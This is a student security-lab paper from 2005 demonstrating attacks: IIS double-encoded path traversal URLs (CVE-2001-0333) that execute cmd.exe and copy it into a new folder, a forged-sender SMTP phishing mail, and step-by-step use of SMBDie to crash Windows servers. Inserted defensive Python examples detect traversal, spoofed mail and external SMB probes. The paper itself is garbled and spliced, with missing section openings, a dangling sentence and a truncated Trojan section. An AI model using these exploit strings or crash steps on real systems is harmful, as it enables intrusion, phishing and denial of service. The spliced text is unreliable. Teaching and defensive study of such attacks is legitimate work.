Material Type: Paper; Professor: Lilien; Class: Embedded Systems; Subject: Computer Science; University: Western Michigan University; Term: Fall 2005;
Typology: Papers
Abstract — In today's world, almost all computers are interconnected to one another. Though this is highly appreciable, it also becomes a necessity to safeguard the computer from outside attacks. The attacks could leave permanent or temporary damage to the computer. In either case a lot of time and money must be spent in fixing the problem. The study of various security flaws helps in understanding the possible vulnerabilities in a system and the ways by which they can be minimized.

Index Terms — exploit, social engineering, Trojan, vulnerability

Manuscript received December, 2005. This work was supported by the Department of Computer Science, Western Michigan University.
Amit T Arakeswara is doing his graduate studies in Computer Science at Western Michigan University, Kalamazoo, MI-49008 (email: [email protected]).
Rathna Kaliannan is doing his graduate studies in Electrical Engineering at Western Michigan University, Kalamazoo, MI-49008 (email: [email protected]).
Vrishal Dinar is doing his graduate studies in Computer Science at Western Michigan University, Kalamazoo, MI-49008 (email: [email protected]).

I. INTRODUCTION

Computers today are highly vulnerable and fall prey to attacks from another person or system. This paper presents an explanation of the various types of attacks and the ways by which these attacks can be prevented.

II. WEB SERVER EXPLOITS

By default all Windows 2000 servers come pre-installed with Microsoft's Internet Information Server (IIS). A number of vulnerabilities have been discovered since the release of IIS 5.0, and exploits have been achieved through these vulnerabilities. A publicly available server must be maintained to retain its confidentiality, integrity and availability. Here we will exploit the vulnerability described in Common Vulnerabilities and Exposures, CVE-2001-0333 [19]. The vulnerability allows the execution of arbitrary commands by remote attackers by encoding ".." and "\" characters twice.

A. Setup

A Windows 2000 Server is exploited with the help of a Windows XP machine. The address of the server is typed into the Internet Explorer address bar of the XP machine. Let's say http://192.168.100.102/ is the address of the server. The page returns the default page of the server [20].

B. The exploit

The web server is exploited by typing
http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
In the above hyperlink, scripts is the directory from which commands will be run. The ..%255c.. is Unicode that is ignored by the web server but used to traverse out of the web root. /winnt/system32/cmd.exe? is the command being called and /c+dir is the option that goes with the command.

Now the winnt directory can be viewed by adding \winnt to the address:
http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+\winnt

A directory is created on the server by including the command c+mkdir+\exploit in the address bar:
http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+
This returns an error, since the command mkdir does not return anything. When the Refresh button is hit, it again returns an error but also shows that the directory exists. Now a trojan or virus could be placed in the directory 'exploit'. cmd.exe is copied into the directory 'exploit' by
http://192.168.100.102/scripts/..%255c../winnt/system32/cmd.exe?/c+copy+\winnt\system32\cmd.exe+\exploit
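The defender's counterpart to the traversal in this section is to recognise it in the server's request log and to canonicalise paths before they reach the file system. The following Python is an added example, not code from the paper: it decodes a request path repeatedly and reports whether a ".." traversal is already visible after one decode (what a normal server sees) or only after a second decode (the CVE-2001-0333 pattern), and it generalises beyond the paper's ..%255c.. to any path that becomes a traversal only on the second decode. The simplified "client method path status" log shape and every sample line are constructed for the example.

```python
"""Detect double-URL-encoded path traversal in web server request paths.

Added illustrative example (not code from the paper). The log format and all
sample lines are constructed.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample log in a simplified "client method path status" shape.
SAMPLE_LOG = r"""
192.168.100.101 GET / 200
192.168.100.101 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 200
192.168.100.101 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+copy+\winnt\system32\cmd.exe+\exploit 502
192.168.100.105 GET /images/logo.gif 200
192.168.100.107 GET /files/%2e%2e/private.txt 404
192.168.100.108 GET /docs/a%252eb.html 200
"""

# ".." delimited by a slash or backslash on either side (or the string edge).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def decode_stages(path, limit=5):
    """Return [raw, decoded once, decoded twice, ...] until decoding is a no-op."""
    stages = [path]
    while len(stages) <= limit:
        nxt = unquote(stages[-1])
        if nxt == stages[-1]:
            break
        stages.append(nxt)
    return stages


def classify(path):
    """'clean', 'traversal' (visible to a server that decodes once), or
    'double-encoded traversal' (visible only after a second decode)."""
    for depth, stage in enumerate(decode_stages(path)):
        if TRAVERSAL.search(stage):
            return "traversal" if depth <= 1 else "double-encoded traversal"
    return "clean"


def escapes_web_root(path):
    """Hardened check: decode until stable, fold '\\' to '/', normalise, and
    refuse anything that still climbs above the web root."""
    full = decode_stages(path)[-1].split("?", 1)[0]
    rel = posixpath.normpath(full.replace("\\", "/").lstrip("/"))
    return rel == ".." or rel.startswith("../")


def scan_log(text):
    """Return (client, path, verdict) for every request that is not clean."""
    flagged = []
    for line in text.strip().splitlines():
        client, _method, path, _status = line.split()
        verdict = classify(path)
        if verdict != "clean":
            flagged.append((client, path, verdict))
    return flagged


if __name__ == "__main__":
    for client, path, verdict in scan_log(SAMPLE_LOG):
        print(f"{client} {verdict}: {path}")
```

The point of escapes_web_root is that a server which decodes once and then checks for ".." passes the double-encoded form, while a check made on the fully decoded, normalised path does not; the log scanner is the detective control for servers that cannot yet be patched.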
The cmd.exe copied into the 'exploit' directory is then used to perform the exploitation. This is done by issuing the address
http://192.168.100.102/scripts/..%255c../exploit/cmd.exe?/c+dir+\exploit

C. Verification and results

The exploit is verified by checking the directory 'exploit' on the Windows 2000 server and the presence of cmd.exe under it.

III. EMAIL SYSTEM EXPLOITS

One of the most widely used applications on the internet is e-mail. Though it is a very convenient way of communication, viruses can easily be delivered through it. The attacker spoofs his email address and sends the message as an authentic mail from a trusted company. The user would obviously be tricked into reading this mail. If he is not aware of spoofing and phishing, he might end up downloading an executable from the email. This executable could be a trojan or a virus. This way of tricking someone into doing something they would normally not do is called social engineering.

A. Exploit on a Linux client - Evolution

Evolution is configured on a Linux client. The server is named linuxserv.security.local. Let a user profile be created with the name 'labuser'. On the Linux client, open Telnet by typing 'telnet'. The 'open' command is issued by entering
open 192.168.100.202 25
192.168.100.202 is the address of the server and 25 is the port of the SMTP mail server. Now a mail can be sent by issuing the following commands:
mail from: [email protected]
rcpt to: [email protected]
data
Write the following in the program:
From: [email protected]
To: [email protected]
Subject: Important update
MIME-Version: 1.
Content-type: text/html; charset=us-ascii

Important update
Hi here!
Enter a "." to complete the message. The word here! is a hyperlink. The reference 'here!' could call a file on the server that may be compromised in terms of security. The link could also be programmed to increment a counter, which would reveal whether the object has been opened by a user or not. The logs stored on the server can be accessed by typing
cat /var/log/httpd/access_log
Now when Evolution is opened, 'labuser' will find a mail in his or her inbox sent from [email protected]. Evolution can now be configured by specifying the host name linuxserv.security.local and the username [email protected]. When the "check for mail" button is clicked, the mail will be delivered and the person is more likely to be tricked into clicking the link.

B. Exploit on Windows - Outlook

Here a Windows 2000 server is used with XP Pro and a Linux server. Outlook Express is configured for 'labuser' using the POP3 protocol. The incoming and outgoing mail server is set to linuxserv.security.local. A mail with the following code is sent by initiating a telnet session as explained earlier.
From: [email protected]
To: [email protected]
Subject: Important Update
MIME-Version: 1.
Content-type: text/html; charset=us-ascii
<html><head><title>Important Updates</title></head>
<body bgcolor="#FF0000">
<h1>Important Updates</h1>
You need the Important Update
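Both mails in subsections A and B are injected by hand over SMTP with a forged From: header, and the receiving side can screen for exactly that. The Python below is an added example, not code from the paper: it reads a message the way the recipient's mailbox stores it and reports the signs a mail-filtering rule would look for, namely a Return-Path (envelope sender) domain that differs from the header From: domain, the Date and Message-ID headers that a hand-typed session omits, and HTML links that point at a bare IP address, at a domain other than the claimed sender, or that carry a query string usable as the open counter described above. The two messages, the addresses, the hosts and the Received/Return-Path headers are all constructed.

```python
"""Heuristic screening of a raw e-mail for forged-sender phishing.

Added illustrative example (not code from the paper). Both messages and every
address, host and header value in them are constructed.
"""
import email
import ipaddress
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed: the lab mail as it might look once the MTA has added
# Return-Path and Received (the hand-typed session set no Date or Message-ID).
SPOOFED_MAIL = """\
Return-Path: <labuser@linuxserv.security.local>
Received: from linuxclient (192.168.100.201) by linuxserv.security.local with SMTP
From: support@trusted-company.test
To: labuser@linuxserv.security.local
Subject: Important update
MIME-Version: 1.0
Content-type: text/html; charset=us-ascii

<html><body><h1>Important update</h1>
Hi, the update is <a href="http://192.168.100.202/update.exe?opened=1">here!</a>
</body></html>
"""

# Constructed: a legitimate notice from the same company, for comparison.
CLEAN_MAIL = """\
Return-Path: <noreply@trusted-company.test>
Date: Fri, 2 Dec 2005 10:15:02 -0500
Message-ID: <20051202151502.1234@mail.trusted-company.test>
From: Support <support@trusted-company.test>
To: labuser@linuxserv.security.local
Subject: Maintenance window
MIME-Version: 1.0
Content-type: text/html; charset=us-ascii

<html><body>Details are on <a href="https://www.trusted-company.test/status">our status page</a>.</body></html>
"""


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _domain(header_value):
    """Domain part of the first address in a header, lower-cased."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze(raw):
    """Return a list of findings; an empty list means no heuristic fired."""
    msg = email.message_from_string(raw)
    findings = []
    sender = _domain(msg.get("From"))
    envelope = _domain(msg.get("Return-Path"))
    if sender and envelope and sender != envelope:
        findings.append(f"envelope sender {envelope} differs from header From domain {sender}")
    for header in ("Date", "Message-ID"):
        if msg.get(header) is None:
            findings.append(f"missing {header} header (typical of a hand-typed SMTP session)")
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_payload(decode=True).decode(part.get_content_charset() or "us-ascii", "replace")
        collector = LinkCollector()
        collector.feed(body)
        for href, text in collector.links:
            url = urlsplit(href)
            host = (url.hostname or "").lower()
            if _is_ip(host):
                findings.append(f'link "{text}" points at a bare IP address {host}')
            elif host and sender and host != sender and not host.endswith("." + sender):
                findings.append(f'link "{text}" points at {host}, not at the sender domain {sender}')
            if url.query:
                findings.append(f'link "{text}" carries a query string ({url.query}) usable as an open counter')
    return findings


if __name__ == "__main__":
    for finding in analyze(SPOOFED_MAIL):
        print("-", finding)
    print("clean message findings:", analyze(CLEAN_MAIL))
```

None of these checks proves forgery on its own; a mail-filtering rule would score them together, and the envelope/From mismatch is the one that sender-authentication mechanisms on the receiving server can turn into a hard reject.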
This will result in packets being sent to the victim apparently from different hosts.

C. Ping

Ping stands for "Packet Internet Groper". It is a utility that sends data packets to check the quality of a link or verify the connection of a machine to the Internet. It provides a basic test of whether a particular host is operating properly and is reachable on the network from the testing host. Ping gives estimates of the round-trip time and the packet loss rate between hosts. It works by sending ICMP "echo request" packets to the target host and listening for replies (ICMP "echo response" packets).

Steps for execution
In the command prompt type the following:
ping
This will give the packet information, the round-trip time etc. if the host exists on the network; otherwise it will result in "operation timed out".

D. SMBDie

SMBDie is a tool which was created to exploit a problem with the Windows operating system; when activated, it will crash and blue screen the server immediately. SMB (Server Message Block) is the protocol Microsoft uses to share files, printers and serial ports, and also to communicate between computers using named pipes and mail slots. Clients make SMB requests for resources and servers make SMB responses in what is described as a client-server, request-response protocol.

An administrator can block access to SMB on TCP ports 445 and 139 at the network perimeter. This would block access from untrusted networks. However, legitimate users could be blocked in a 'file and print' networking environment. Administrators could also shut down the lanman server service, but this action would block legitimate users from using file and print services on the particular server where the lanman service had been stopped. The remedy for this is to download the patches from the following Microsoft sites, based on the operating system/server installed. For Microsoft Windows 2000 it is
http://www.microsoft.com/downloads/Release.asp?ReleaseID=
For Microsoft Windows XP it is
http://www.microsoft.com/downloads/Release.asp?ReleaseID=

Steps for execution
Download the SMBDie tool from http://www.windowssecurity.com
Extract the entire file into a folder and double click on the executable. This will prompt for the IP address and the NetBIOS name of the server to be crashed. The NetBIOS name can be found by executing the command nbtstat -n in the command prompt. Press the "Kill" button; you will observe that the server has crashed and blue screened immediately.

E. Ethereal

Ethereal is a network protocol analyzer, otherwise known as a "packet sniffer", which is a tool that captures and decodes packets of information from a network. Ethereal can capture live network traffic or read data from a file and translate the data into a format the user can understand. Network analyzers such as Ethereal are invaluable tools for administrators to diagnose and troubleshoot problems with, but they are also used by intruders to obtain unauthorized information. Ethereal can be used to capture and analyze network packets and discover a wide array of information, such as:
Troubleshooting network issues and locating bottlenecks
Network intrusion detection
Logging network traffic for forensic analysis
Discovering a DoS (denial-of-service) attack

Steps for execution
Download Ethereal from http://www.ethereal.com
Run the executable.
List all the available capture interfaces by clicking the first option on the toolbar.
Select the interface to be captured and sniff through all the packets on that interface.

V. TROJAN ATTACKS

A computer virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents [1]. It behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. A Trojan horse is a similar kind of program, the only difference being that it is disguised as legitimate software. It is so named after the legendary 'Trojan horse' left on the shores of Troy by the Greeks to lull the Trojans into a false sense of belief that the war was over. We will be talking about two Trojan horse programs, hitherto referred to as 'trojan(s)'.
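The SMBDie subsection above states the mitigation as a perimeter rule: block TCP 139 and 445 from untrusted networks while file-and-print traffic inside the LAN keeps working. The Python below is an added example, not code from the paper, that applies that rule to a firewall log and counts the outside sources that still try, which is what an administrator would watch while the patches are being rolled out. It assumes the lab subnet 192.168.100.0/24 (the paper's addresses fall in that range) as the only trusted network; the "date time proto src dst sport dport" log format and every line in it are constructed.

```python
"""Perimeter policy for SMB (TCP 139/445) applied to a firewall log.

Added illustrative example (not code from the paper). The trusted subnet is an
assumption; the log format and the sample lines are constructed.
"""
import ipaddress
from collections import Counter

TRUSTED_NETS = [ipaddress.ip_network("192.168.100.0/24")]  # assumed lab LAN
SMB_PORTS = {139, 445}

# Constructed log: "date time proto src dst sport dport"
SAMPLE_LOG = """\
2005-12-02 10:15:01 TCP 192.168.100.105 192.168.100.102 1034 445
2005-12-02 10:15:02 TCP 10.20.30.40 192.168.100.102 3345 445
2005-12-02 10:15:03 TCP 10.20.30.40 192.168.100.102 3346 139
2005-12-02 10:15:04 TCP 192.168.100.107 192.168.100.102 1040 139
2005-12-02 10:15:05 TCP 203.0.113.9 192.168.100.102 52211 445
2005-12-02 10:15:06 TCP 10.20.30.40 192.168.100.102 3347 80
"""


def is_trusted(addr):
    """True when the address lies inside one of the trusted networks."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED_NETS)


def parse_line(line):
    """Split one constructed log line into a record with typed fields."""
    date, time, proto, src, dst, sport, dport = line.split()
    return {"when": f"{date} {time}", "proto": proto.upper(), "src": src,
            "dst": dst, "sport": int(sport), "dport": int(dport)}


def perimeter_decision(rec):
    """'block' for SMB from an untrusted source, otherwise 'allow'.

    LAN clients reaching the file-and-print server are left alone, which is the
    trade-off the paper describes for a perimeter rule as opposed to stopping
    the lanman service on the server itself."""
    if rec["proto"] == "TCP" and rec["dport"] in SMB_PORTS and not is_trusted(rec["src"]):
        return "block"
    return "allow"


def audit(log_text):
    """Apply the policy to every line; return (decisions, blocked attempts per source)."""
    decisions = []
    probes = Counter()
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        verdict = perimeter_decision(rec)
        decisions.append((rec["when"], rec["src"], rec["dport"], verdict))
        if verdict == "block":
            probes[rec["src"]] += 1
    return decisions, probes


if __name__ == "__main__":
    decisions, probes = audit(SAMPLE_LOG)
    for when, src, dport, verdict in decisions:
        print(f"{when} {src} -> {dport}: {verdict}")
    print("external SMB attempts per source:", dict(probes))
```

The per-source counter is the detection side of the same rule: a single outside address hitting both 139 and 445 in quick succession is the traffic shape to expect from a crash tool, and it is visible in the log even though the packets never reach the server.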
The vulnerability of the Windows 2000 web server is studied and tested. It therefore becomes necessary to apply the latest security updates and patches as soon as any operating system with IIS is installed. The denial of service attacks warn users without firewalls. The SubSeven and Netbus trojans show how vulnerable a system can be in a networked environment. This, along with email spoofing, warns users to constantly scan their systems using updated anti-virus software.

ACKNOWLEDGMENT

We would like to thank our teacher, Dr. Leszek Lilien, for his continued support all throughout this semester, and for helping us out of any speed bumps we might have faced. We would also like to thank the lab administrators in room C- for letting us continue our work in spite of all the noise and the odd timings of our operation.

REFERENCES

[1] http://en.wikipedia.org/wiki/Computer_virus
[2] http://www.hackfix.org/netbusfix/
[3] http://www.windowsecurity.com/articles/The_Netbus_trojan.html
[4] http://www.cultdeadcow.com
[5] http://www.hackfix.org/SubSeven/
[6] http://www.tcp-ip-info.de/trojaner_und_viren/netbus_pro_eng.htm
[7] http://www.hackpr.net/~sub7/
[8] http://www.hackpr.net/~sub7/faq.shtml
[9] http://www.come.to/soul4blade
[10] http://www.ethereal.com
[11] http://www.fsf.org/
[12] http://www.gnu.org
[13] http://www.gnu.org/philosophy/free-sw.html
[14] http://www.windowssecurity.com.articles/SMBDie_Crashinf_Windows_Servers_with_Ease.html
[15] http://www.ss64.com/nt/nbtstat.html
[16] http://insecure.org/nmap/
[17] http://www.securityfocus.com/infocus/
[18] http://www.ethereal.com/distribution/win32/
[19] http://www.cve.mitre.org/
[20] Vincent J Nestler, Wm. Arthur Conklin, Gregory B. White, Matthew P. Hirsch, "Computer Security Lab Manual", McGraw Hill, 2005
[21] Pfleeger and Pfleeger, "Security in Computing", Third Edition, Prentice Hall PTR, 2003